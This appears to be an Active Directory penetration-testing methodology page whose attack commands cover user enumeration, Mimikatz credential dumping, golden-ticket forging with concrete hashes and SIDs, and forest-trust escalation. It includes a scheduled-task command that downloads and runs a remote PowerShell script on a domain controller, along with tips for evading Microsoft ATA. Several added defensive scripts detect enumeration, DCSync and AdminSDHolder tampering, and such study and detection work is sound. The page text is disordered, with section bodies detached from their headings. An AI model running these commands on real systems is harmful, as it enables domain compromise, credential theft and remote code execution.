Active Directory Methodology

Last updated 3 years ago

Basic overview

Active Directory allows network administrators to create and manage domains, users, and objects within a network. For example, an admin can create a group of users and give them specific access privileges to certain directories on the server. As a network grows, Active Directory provides a way to organize a large number of users into logical groups and subgroups, while providing access control at each level.

The Active Directory structure includes three main tiers: 1) domains, 2) trees, and 3) forests. Several objects (users or devices) that all use the same database may be grouped into a single domain. Multiple domains can be combined into a single group called a tree. Multiple trees may be grouped into a collection called a forest. Each one of these levels can be assigned specific access rights and communication privileges.

Main concepts of an Active Directory:

  1. Directory – Contains all the information about the objects of the Active directory

  2. Object – An object references almost anything inside the directory (a user, group, shared folder...)

  3. Domain – The objects of the directory are contained inside the domain. Inside a "forest" more than one domain can exist, and each of them has its own collection of objects.

  4. Tree – Group of domains with the same root. Example: dom.local, email.dom.local, www.dom.local

  5. Forest – The forest is the highest level of the organization hierarchy and is composed of a group of trees. The trees are connected by trust relationships.

Active Directory provides several different services, which fall under the umbrella of "Active Directory Domain Services," or AD DS. These services include:

  1. Domain Services – stores centralized data and manages communication between users and domains; includes login authentication and search functionality

  2. Certificate Services – creates, distributes, and manages secure certificates

  3. Lightweight Directory Services – supports directory-enabled applications using the open (LDAP) protocol

  4. Directory Federation Services – provides single-sign-on (SSO) to authenticate a user in multiple web applications in a single session

  5. Rights Management – protects copyrighted information by preventing unauthorized use and distribution of digital content

  6. DNS Service – Used to resolve domain names.

Kerberos Authentication

Cheat Sheet

Recon Active Directory (No creds/sessions)

If you just have access to an AD environment but you don't have any credentials/sessions you could:

  • Check for null and Guest access on smb services (this won't work on modern Windows versions):

    • enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>

    • smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>

    • smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //<DC IP>

  • Enumerate LDAP:

    • nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>

  • Poison the network

User enumeration

When an invalid username is requested, the server responds with the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN, which tells us that the username was invalid. Valid usernames elicit either a TGT in an AS-REP response or the error KRB5KDC_ERR_PREAUTH_REQUIRED, indicating that the user is required to perform pre-authentication.

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>
msf> use auxiliary/gather/kerberos_enumusers
./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
crackmapexec smb dominio.es  -u '' -p '' --users | awk '{print $4}' | uniq
enum4linux -U 10.10.10.161 | grep 'user:' | sed 's/user:\[//g' | sed 's/\]//g' | awk '{print $1}'

You could also use the impacket ASREPRoast script to enumerate valid usernames.
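The error-code behaviour described above is also what a defender can key on: every AS-REQ the KDC rejects with KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN lands in Windows Security event 4768 with result code 0x6, so a burst of 0x6 replies from one client address is a username-enumeration signal. The following detection is an added example (not HackTricks code); the log lines are a constructed flat rendering of the 4768 fields TargetUserName, IpAddress and Status, not real telemetry.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos error codes as they appear in the Status/Result Code field of
# Windows Security event 4768 (Kerberos authentication ticket requested).
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6   # no such principal: the enumeration signal
KDC_ERR_PREAUTH_REQUIRED = 0x19     # principal exists, pre-auth required
KDC_SUCCESS = 0x0                   # TGT issued

# Constructed sample events (not real logs). Real 4768 events carry the client
# address IPv4-mapped, hence the ::ffff: prefix.
SAMPLE_LOG = """\
2024-01-10T09:00:00Z EventID=4768 IpAddress=::ffff:10.0.0.5 TargetUserName=alice Status=0x0
2024-01-10T09:00:03Z EventID=4768 IpAddress=::ffff:10.0.0.5 TargetUserName=alcie Status=0x6
2024-01-10T09:05:00Z EventID=4768 IpAddress=::ffff:10.0.0.7 TargetUserName=aaron Status=0x6
2024-01-10T09:05:00Z EventID=4768 IpAddress=::ffff:10.0.0.7 TargetUserName=abby Status=0x6
2024-01-10T09:05:01Z EventID=4768 IpAddress=::ffff:10.0.0.7 TargetUserName=admin Status=0x6
2024-01-10T09:05:01Z EventID=4768 IpAddress=::ffff:10.0.0.7 TargetUserName=administrator Status=0x19
2024-01-10T09:05:02Z EventID=4768 IpAddress=::ffff:10.0.0.7 TargetUserName=bob Status=0x6
2024-01-10T09:05:02Z EventID=4768 IpAddress=::ffff:10.0.0.7 TargetUserName=carol Status=0x6
2024-01-10T09:05:03Z EventID=4768 IpAddress=::ffff:10.0.0.7 TargetUserName=svc_sql Status=0x19
2024-01-10T11:00:00Z EventID=4768 IpAddress=::ffff:10.0.0.9 TargetUserName=dave Status=0x6
2024-01-10T14:00:00Z EventID=4768 IpAddress=::ffff:10.0.0.9 TargetUserName=erin Status=0x6
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=4768 IpAddress=(?:::ffff:)?(?P<ip>[\d.]+) "
    r"TargetUserName=(?P<user>\S+) Status=(?P<status>0x[0-9A-Fa-f]+)$"
)


def parse_4768(line):
    """Parse one constructed 4768 line; return None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "ip": m["ip"],
        "user": m["user"],
        "status": int(m["status"], 16),
    }


def detect_user_enum(lines, threshold=5, window_seconds=60):
    """Flag source IPs that triggered at least `threshold` PRINCIPAL_UNKNOWN
    replies inside any `window_seconds` window. For each flagged source the
    result lists the names it probed and the names the KDC confirmed as real
    (SUCCESS or PREAUTH_REQUIRED), i.e. exactly what the scanner learned."""
    per_ip = defaultdict(list)
    for line in lines:
        ev = parse_4768(line)
        if ev:
            per_ip[ev["ip"]].append(ev)

    window = timedelta(seconds=window_seconds)
    alerts = {}
    for ip, evs in per_ip.items():
        unknown = sorted(
            (e for e in evs if e["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN),
            key=lambda e: e["ts"],
        )
        start = 0
        for end in range(len(unknown)):
            # Slide the window start forward until the span fits in the window.
            while unknown[end]["ts"] - unknown[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {
                    "probed": sorted({e["user"] for e in unknown}),
                    "confirmed": sorted({
                        e["user"] for e in evs
                        if e["status"] in (KDC_SUCCESS, KDC_ERR_PREAUTH_REQUIRED)
                    }),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, detail in detect_user_enum(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: probed {len(detail['probed'])} names, "
              f"confirmed {detail['confirmed']}")
```

A single mistyped username (10.0.0.5 above) stays below the threshold, while the burst from 10.0.0.7 is flagged together with the two accounts it confirmed to exist.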

Knowing one or several usernames

OK, so you already have a valid username but no password. Then try:

Enumerating Active Directory (Some creds/Session)

For this phase you need to have compromised the credentials or a session of a valid domain account.

Enumeration

Having compromised an account is a big step towards compromising the whole domain, because you can now start the Active Directory enumeration:

Even if this Enumeration section looks small, it is the most important part of all. Access the links (mainly those for CMD, PowerShell, PowerView and BloodHound), learn how to enumerate a domain and practice until you feel comfortable. During an assessment, this will be the key moment to find your way to DA or to decide that nothing can be done.

Kerberoast

Local Privilege Escalation

Win-RM

Privesc on Active Directory (Some "privileged" Creds/Session)

For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.

Hash extraction

Pass the Hash

Over Pass the Hash/Pass the Key

Pass the Ticket

MSSQL Trusted Links

Unconstrained Delegation

Constrained Delegation

ACLs Abuse

Printer Spooler service abuse

Dumping Domain Credentials

Once you get Domain Admin privileges, you can dump the whole domain database.

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Persistence

Golden Ticket

A valid TGT as any user can be created using the NTLM hash of the krbtgt AD account. The advantage of forging a TGT instead of a TGS is being able to access any service (or machine) in the domain as the impersonated user.

Silver Ticket

AdminSDHolder Group

DSRM Credentials

ACL Persistence

Security Descriptors

Skeleton Key

Custom SSP

DCShadow

Forest Privilege Escalation - Domain Trusts

Microsoft does not consider the domain a security boundary; the forest is the security boundary. This means that if you compromise a domain inside a forest you are going to be able to compromise the entire forest.

Basic Information

Essentially, all a trust does is link up the authentication systems of two domains and allow authentication traffic to flow between them through a system of referrals. When two domains trust each other they exchange keys; these keys are saved in the DCs of each domain (one key per trust direction) and are the base of the trust.

When a user tries to access a service in the trusting domain, it requests an inter-realm TGT from the DC of its own domain. The DC serves the client this TGT, which is encrypted/signed with the inter-realm key (the key both domains exchanged). Then the client contacts the DC of the other domain and requests a TGS for the service using the inter-realm TGT. The DC of the trusting domain checks the key used and, if it is correct, trusts everything in that ticket and serves the TGS to the client.

Different trusts

It's important to notice that a trust can be one-way or two-way. In a two-way trust both domains trust each other, but in a one-way trust one of the domains is the trusted domain and the other the trusting domain. In the latter case, you will only be able to access resources inside the trusting domain from the trusted one.

A trust relationship can also be transitive (A trusts B, B trusts C, then A trusts C) or non-transitive.

Different trusting relationships:

  • Parent/Child – part of the same forest – a child domain retains an implicit two-way transitive trust with its parent. This is probably the most common type of trust that you’ll encounter.

  • Cross-link – aka a “shortcut trust” between child domains to improve referral times. Normally referrals in a complex forest have to filter up to the forest root and then back down to the target domain, so for a geographically spread out scenario, cross-links can make sense to cut down on authentication times.

  • Forest – a transitive trust between one forest root domain and another forest root domain. Forest trusts also enforce SID filtering.

Attack Path

  1. Enumerate the trusting relationships

  2. Check if any security principal (user/group/computer) has access to resources of the other domain, maybe by ACE entries or by being in groups of the other domain. Look for relationships across domains (the trust was created for this probably).

    1. Kerberoasting could be another option in this case.

  3. Compromise the accounts which can pivot through domains.

There are three main ways that security principals (users/groups/computers) from one domain can have access to resources in another foreign/trusting domain:

  • They can be added to local groups on individual machines, i.e. the local “Administrators” group on a server.

  • They can be added to groups in the foreign domain. There are some caveats depending on trust type and group scope, described shortly.

Child-to-Parent forest privilege escalation

Also, notice that there are two trust keys, one for Child --> Parent and another one for Parent --> Child.

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:7ef5be456dc8d7450fb8f5f7348746c5 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'
/domain:<Current domain>
/sid:<SID of current domain>
/sids:<SID of the Enterprise Admins group of the parent domain>
/rc4:<Trusted key>
/user:Administrator
/service:<target service>
/target:<Other domain>
/ticket:C:\path\save\ticket.kirbi

To find the SID of the "Enterprise Admins" group, find the SID of the root domain and append the RID 519 to it (S-1-5-21-<root domain>-519). For example, from the root domain SID S-1-5-21-280534878-1496970234-700767426 the "Enterprise Admins" group SID is S-1-5-21-280534878-1496970234-700767426-519.

.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$

Escalate to DA of the root domain or to Enterprise Admin using the KRBTGT hash of the compromised domain:

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"

External Forest Domain Privilege escalation

In this case you can use the trust key to sign a TGT impersonating the Administrator user of the current domain. However, you won't always get Domain Admin privileges in the external domain, only the privileges that the Administrator user of your current domain was granted in the external domain.

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'

Domain trust abuse mitigation

SID Filtering:

  • Prevents attacks that abuse the SID history attribute across forest trusts.

  • Enabled by default on all inter-forest trusts. Intra-forest trusts are assumed secure by default (Microsoft considers the forest, not the domain, to be the security boundary).

  • But since SID filtering has the potential to break applications and user access, it is often disabled.

  • Selective Authentication

    • In an inter-forest trust, if Selective Authentication is configured, users across the trust are not automatically authenticated. Access to individual domains and servers in the trusting domain/forest must be granted explicitly.
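The SID Filtering bullets above explain why the /sids: Enterprise Admins injection from the child-to-parent section works inside a forest but not across a filtered forest trust. The model below is an added example (not HackTricks code) and is deliberately simplified: it keeps only the core rule that a trusting DC discards any SID in an inbound ticket whose domain is not part of the trusted forest. The root and child SIDs are the page's lab values; the external-forest SID is constructed.

```python
ENTERPRISE_ADMINS_RID = 519  # well-known RID; the group exists only in the forest root

# Domain SIDs from the page's lab (moneycorp root, dollarcorp child) plus one
# constructed SID standing in for a domain in a separate, externally trusted forest.
ROOT_DOMAIN_SID = "S-1-5-21-280534878-1496970234-700767426"
CHILD_DOMAIN_SID = "S-1-5-21-1874506631-3219952063-538504511"
EXTERNAL_DOMAIN_SID = "S-1-5-21-111111111-222222222-333333333"  # constructed


def domain_of(sid):
    """Domain part of an account/group SID: everything before the trailing RID."""
    return sid.rsplit("-", 1)[0]


def enterprise_admins_sid(root_domain_sid):
    """Enterprise Admins SID = forest root domain SID + '-519'."""
    return f"{root_domain_sid}-{ENTERPRISE_ADMINS_RID}"


def sid_filter(ticket_sids, trusted_forest_domains, filtering_enabled=True):
    """Simplified SID filtering as applied by the trusting DC to the SIDs carried
    in an inbound inter-realm ticket (user SID, groups, SID history / extra SIDs).
    With filtering on, any SID whose domain is not in the trusted forest is
    silently discarded. Returns (accepted, dropped)."""
    if not filtering_enabled:
        return list(ticket_sids), []
    accepted, dropped = [], []
    for sid in ticket_sids:
        (accepted if domain_of(sid) in trusted_forest_domains else dropped).append(sid)
    return accepted, dropped


def ea_sid_survives(scenario):
    """Does an injected Enterprise Admins SID survive the trust hop?
    'child_to_parent': intra-forest trust, where the page notes SID filtering
    is not applied. 'external_forest': forest trust with default filtering."""
    ea = enterprise_admins_sid(ROOT_DOMAIN_SID)
    if scenario == "child_to_parent":
        sids = [f"{CHILD_DOMAIN_SID}-500", ea]
        accepted, _ = sid_filter(sids, {CHILD_DOMAIN_SID}, filtering_enabled=False)
    elif scenario == "external_forest":
        # The target forest's own EA SID is not something the external forest
        # may legitimately present, so filtering strips it.
        sids = [f"{EXTERNAL_DOMAIN_SID}-500", ea]
        accepted, _ = sid_filter(sids, {EXTERNAL_DOMAIN_SID})
    else:
        raise ValueError(f"unknown scenario: {scenario}")
    return ea in accepted


if __name__ == "__main__":
    for name in ("child_to_parent", "external_forest"):
        print(f"{name}: Enterprise Admins SID kept = {ea_sid_survives(name)}")
```

Disabling SID filtering on a forest trust (the "often disabled" case above) collapses the second scenario into the first, which is the practical reason the bullet warns about it.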

Some General Defenses

  • Do not allow Domain Admins to log in on any hosts other than Domain Controllers

  • Never run a service with DA privileges

  • If you need Domain Admin privileges, limit the time: Add-ADGroupMember -Identity 'Domain Admins' -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)

Deception

  • Password does not expire

  • Trusted for Delegation

  • Users with SPN

  • Password in description

  • Users who are members of high privilege groups

  • Users with ACL rights over other users, groups or containers

  • Computer objects

  • ...

Example with Deploy-Deception (https://github.com/samratashok/Deploy-Deception):

Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
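What the Deploy-Deception command above does, written out with plain cmdlets as an added example (not Deploy-Deception's code): a decoy user with "password never expires" plus a SACL so that reading one of its attributes, which tools that pull all properties do, writes Security event 4662 on the DC. It assumes "Audit Directory Service Access" (Success) is enabled on the domain controllers; the decoy name is constructed.

```powershell
# Added example: decoy user whose enumeration is audited.
Import-Module ActiveDirectory

$decoyName = 'svc-backup-legacy'                          # constructed decoy account name
$decoyPass = Read-Host -AsSecureString 'Decoy password'

New-ADUser -Name $decoyName -SamAccountName $decoyName -AccountPassword $decoyPass `
           -Enabled $true -PasswordNeverExpires $true -Description 'Legacy backup service account'
$decoyDN = (Get-ADUser -Identity $decoyName).DistinguishedName

# Attribute whose read triggers the audit: look its schemaIDGUID up in the schema instead
# of hard-coding it (the page's Deploy-Deception command passes the GUID directly)
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$attr     = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=x500uniqueIdentifier)' -Properties schemaIDGUID
$attrGuid = [guid]$attr.schemaIDGUID

# Audit successful ReadProperty of that attribute by anyone (S-1-1-0 = Everyone)
$rule = [System.DirectoryServices.ActiveDirectoryAuditRule]::new(
    [System.Security.Principal.SecurityIdentifier]'S-1-1-0',
    [System.DirectoryServices.ActiveDirectoryRights]::ReadProperty,
    [System.Security.AccessControl.AuditFlags]::Success,
    $attrGuid)
$acl = Get-Acl -Path "AD:\$decoyDN"
$acl.AddAuditRule($rule)
Set-Acl -Path "AD:\$decoyDN" -AclObject $acl

# Later, on a DC: 4662 events that name the decoy show who enumerated it
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4662 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match [regex]::Escape("CN=$decoyName,") } |
    Select-Object TimeCreated, @{ n = 'Subject'; e = { $_.Properties[1].Value } }
```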

How to identify deception

For user objects:

  • objectSid (different from the domain)

  • lastLogon, lastLogonTimestamp

  • logonCount (a very low number is suspicious)

  • whenCreated

  • badPwdCount (a very low number is suspicious)

General:

  • Some solutions fill in all the possible attributes. For example, compare the attributes of a computer object with those of a computer object that is certainly real, like a DC, or compare users against RID 500 (the default admin).

  • Check if something looks too good to be true (see also https://github.com/JavelinNetworks/HoneypotBuster).

Bypassing Microsoft ATA detection

User enumeration

ATA only complains when you try to enumerate sessions on the DC, so if you look for sessions on the other hosts rather than on the DC, you probably won't get detected.

Tickets impersonation creation (Over pass the hash, golden ticket...)

Always create the tickets using the AES keys as well, because what ATA identifies as malicious is the downgrade to NTLM (RC4) encryption.

DCSync

If you don't execute this from a Domain Controller, ATA is going to catch you, sorry.
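The detection ATA relies on here can be reproduced from the DC's own Security log: replication requests (the primitive DCSync uses) from accounts that are not domain controllers. Added example, not from the page; it assumes "Audit Directory Service Access" (Success) is enabled and that it runs on a DC:

```powershell
# Added example: find replication requests that did not come from a DC (event 4662).
Import-Module ActiveDirectory

# Control-access-right GUIDs a DCSync needs (real schema values, not constructed)
$replGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'    # DS-Replication-Get-Changes-In-Filtered-Set
)
# DC machine accounts replicate legitimately; add any Azure AD Connect account
# (which also replicates) to this allow-list by name
$allowed = (Get-ADDomainController -Filter *).Name | ForEach-Object { "$_`$" }

function Find-NonDCReplication {
    param([datetime]$Since = (Get-Date).AddDays(-1))
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4662; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Pull the named EventData fields out of the event XML
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time       = $_.TimeCreated
                Subject    = $data['SubjectUserName']
                Domain     = $data['SubjectDomainName']
                Object     = $data['ObjectName']
                Properties = $data['Properties']
            }
        } |
        Where-Object {
            $props  = $_.Properties
            $isRepl = @($replGuids | Where-Object { $props -match $_ }).Count -gt 0
            $isRepl -and ($allowed -notcontains $_.Subject)
        }
}

Find-NonDCReplication | Format-Table -AutoSize
```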

More Tools

AD DS is included with Windows Server (including Windows Server 10) and is designed to manage client systems. While systems running the regular version of Windows do not have the administrative features of AD DS, they do support Active Directory. This means any Windows computer can connect to a Windows workgroup, provided the user has the correct login credentials. From: https://techterms.com/definition/active_directory

To learn how to attack an AD you need to understand the Kerberos authentication process really well. Read the dedicated page if you still don't know how it works.

You can take a look at https://wadcoms.github.io/ to have a quick view of which commands you can run to enumerate/exploit an AD.

Pentest the network: scan the network, find machines and open ports, and try to exploit vulnerabilities or extract credentials from them (for example, printers could be very interesting targets). Take a look at the General Pentesting Methodology to find more information about how to do this. More detailed guides on how to enumerate an SMB server and how to enumerate LDAP can be found in their own pages.

  • Gather credentials impersonating services with Responder

  • Access hosts by abusing the relay attack

  • Gather credentials by exposing fake UPnP services with evil-SSDP

OSINT: Try to extract possible usernames from services (mainly web) inside the domain environment and also from the publicly available web pages of the company. If you find the complete names of company workers, you could try different AD username conventions (read this). The most common conventions are: NameSurname, Name.Surname, NamSur (3 letters of each), Nam.Sur, NSurname, N.Surname, SurnameName, Surname.Name, SurnameN, Surname.N, 3 random letters and 3 random numbers (abc123). You could also try the statistically most used usernames: https://github.com/insidetrust/statistically-likely-usernames. Read the following Username enumeration section to learn how to find out whether a username is valid or not.

ASREPRoast: If a user doesn't have the attribute DONT_REQ_PREAUTH you can request an AS-REP message for that user that will contain some data encrypted with a key derived from the user's password.

Password Spraying: Try the most common passwords with each of the discovered users; maybe some user is using a bad password (keep in mind the password policy).

A final option, if the accounts cannot be locked, is traditional bruteforce.

If you have some valid credentials or a shell as a domain user, remember that the options given before are still options to compromise other users. Regarding ASREPRoast, you can now find every possible vulnerable user, and regarding Password Spraying, you can get a list of all the usernames and try the password of the compromised account (if you know it). It's very easy to obtain all the domain usernames from Windows (net user /domain, Get-DomainUser or wmic useraccount get name,sid). In Linux you can use: GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username

You could use some Windows binaries from the CMD to perform a basic recon, but using powershell for recon will probably be stealthier, and you could even use powerview to extract more detailed information. Always learn what a CMD or powershell/powerview command does before executing it; this way you will know how stealthy you are being.

Another amazing tool for recon in an Active Directory is BloodHound. It is not very stealthy (depending on the collection methods you use), but if you don't care about that, you should totally give it a try.

If you are using Linux, you could also enumerate the domain using pywerview.

You could also try https://github.com/tomcarver16/ADSearch

The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets is encrypted with keys derived from user passwords, and as a consequence their credentials could be cracked offline. You can tell that a user account is being used as a service because the property "ServicePrincipalName" is not null. Find more information about this attack in the Kerberoast page.

If you have compromised credentials or a session as a regular domain user and you have access with this user to any machine in the domain, you should try to find your way to escalate privileges locally. This is because only with admin privileges will you be able to dump hashes of other users in memory (LSASS) and locally (SAM). There is a complete page in this book about local privilege escalation in Windows and a checklist. Also, don't forget to use WinPEAS.

Once you have obtained some credentials you can check whether you have access to any machine using the win-rm service.

Hopefully you have managed to compromise some local admin account using ASREPRoast, Password Spraying, Kerberoast, Responder, EvilSSDP, ... or escalating privileges locally. Then it's time to dump all the hashes in memory and locally. Read the page about the different ways to obtain the hashes.

Once you have the hash of a user, you can use it to impersonate that user. You need to use some tool that will perform the NTLM authentication using that hash, or you could create a new logon session and inject that hash into LSASS, so that when any NTLM authentication is performed, that hash will be used. The last option is what mimikatz does.

This attack aims to use the user NTLM hash to request Kerberos tickets, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially useful in networks where NTLM protocol is disabled and only Kerberos is allowed as authentication protocol.

This attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner. .

If a user has privileges to access MSSQL instances, he could be able to use them to execute commands on the MSSQL host (if running as SA). Also, a MSSQL instance may be trusted (database link) by a different MSSQL instance: if the user has privileges over the trusted database, he will be able to use the trust relationship to execute queries on the other instance as well. These trusts can be chained, and at some point the user might find a misconfigured database where he can execute commands. The links between databases work even across forest trusts.

If you find any Computer object with the attribute ADS_UF_TRUSTED_FOR_DELEGATION and you have domain privileges on the computer, you will be able to dump the TGTs from memory of every user that logs in to the computer. So, if a Domain Admin logs in to the computer, you will be able to dump his TGT and impersonate him using Pass the Ticket. Thanks to constrained delegation you could even automatically compromise a Print Server (hopefully it will be a DC).

If a user or computer is allowed "Constrained Delegation", it will be able to impersonate any user to access some services on a computer. Then, if you compromise the hash of this user/computer, you will be able to impersonate any user (even domain admins) to access those services.

The compromised user could have some interesting privileges over some domain objects that could let you move laterally/escalate privileges.

If you can find any Spool service listening inside the domain, you may be able to abuse it to obtain new credentials and escalate privileges.

More information about the DCSync attack and about how to steal the NTDS.dit (Domain database) can be found in their own pages.

Some of the techniques discussed before can be used for persistence. For example, you could make a user vulnerable to ASREPRoast or to Kerberoast.

The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of service is owned (like the PC account hash). Thus, it is possible to gain access to that service by forging a custom TGS as any user (like privileged access to a computer).

The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins. By default, the ACL of this object is copied onto all the "protected groups". This is done to avoid intentional or accidental changes to these critical groups. However, if an attacker modifies the ACL of AdminSDHolder, for example giving full permissions to a regular user, this user will have full permissions on all the protected groups (within an hour). And if someone tries to remove this user from Domain Admins (for example), within an hour or less the user will be back in the group.
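Because SDProp re-applies this template every hour, the ACL of AdminSDHolder is worth auditing on its own. Added example (not from the page): it lists the ACEs on AdminSDHolder whose grantee is outside a baseline of principals that normally hold rights there; the baseline is an assumption to tune for your forest.

```powershell
# Added example: ACEs on AdminSDHolder granted to unexpected principals.
Import-Module ActiveDirectory

function Get-AdminSDHolderAnomalies {
    $domain = Get-ADDomain
    $nb     = $domain.NetBIOSName
    $path   = "AD:\CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"

    # Principals that hold ACEs on AdminSDHolder in a stock domain (assumption: adjust as needed)
    $expected = @(
        'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF', 'NT AUTHORITY\Authenticated Users',
        'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS', 'Everyone',
        'BUILTIN\Administrators', 'BUILTIN\Pre-Windows 2000 Compatible Access',
        'BUILTIN\Terminal Server License Servers', 'BUILTIN\Windows Authorization Access Group',
        "$nb\Domain Admins", "$nb\Enterprise Admins", "$nb\Cert Publishers",
        "$nb\Key Admins", "$nb\Enterprise Key Admins"
    )

    (Get-Acl -Path $path).Access |
        Where-Object { $expected -notcontains $_.IdentityReference.Value } |
        Select-Object IdentityReference, ActiveDirectoryRights, AccessControlType, IsInherited
}

# Anything returned here is pushed to every protected group and member on the next SDProp run
Get-AdminSDHolderAnomalies | Format-Table -AutoSize
```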

There is a local administrator account inside each DC. Having admin privileges on this machine, you can use mimikatz to dump the local Administrator hash. Then, by modifying a registry key you can activate this password so you can remotely access the DC as this local Administrator user.

You could give some special permissions to a user over some specific domain objects that will let the user escalate privileges in the future.

Security descriptors are used to store the permissions that principals have over an object. If you can just make a small change in the security descriptor of an object, you can obtain very interesting privileges over that object without needing to be a member of a privileged group.

Modify LSASS in memory to create a master password that will work for any account in the domain.

You can create your own SSP to capture in clear text the credentials used to access the machine.

It registers a new Domain Controller in the AD and uses it to push attributes (SIDHistory, SPNs...) onto specified objects without leaving any logs regarding the modifications. You need DA privileges and to be inside the root domain. Note that if you use wrong data, pretty ugly logs will appear.

At a high level, a domain trust establishes the ability for users in one domain to authenticate to resources or act as a security principal in another domain.

External – an implicitly non-transitive trust created between disparate domains. "External trusts provide access to resources in a domain outside of the forest that is not already joined by a forest trust." External trusts enforce SID filtering, a security protection covered later in this post.

Tree-root – an implicit two-way transitive trust between the forest root domain and the new tree root you're adding. I haven't encountered tree-root trusts too often, but from the Microsoft documentation, they're created when you create a new domain tree in a forest. These are intra-forest trusts, and they preserve two-way transitivity while allowing the tree to have a separate domain name (instead of child.parent.com).

MIT – a trust with a non-Windows RFC4120-compliant Kerberos domain. I hope to dive more into MIT trusts in the future.

They can be added as principals in an access control list, most interesting for us as principals in ACEs in a DACL. For more background on ACLs/DACLs/ACEs, check out the "An ACE Up The Sleeve" whitepaper. (From http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)

Please find some mitigations against each technique in the description of the technique.
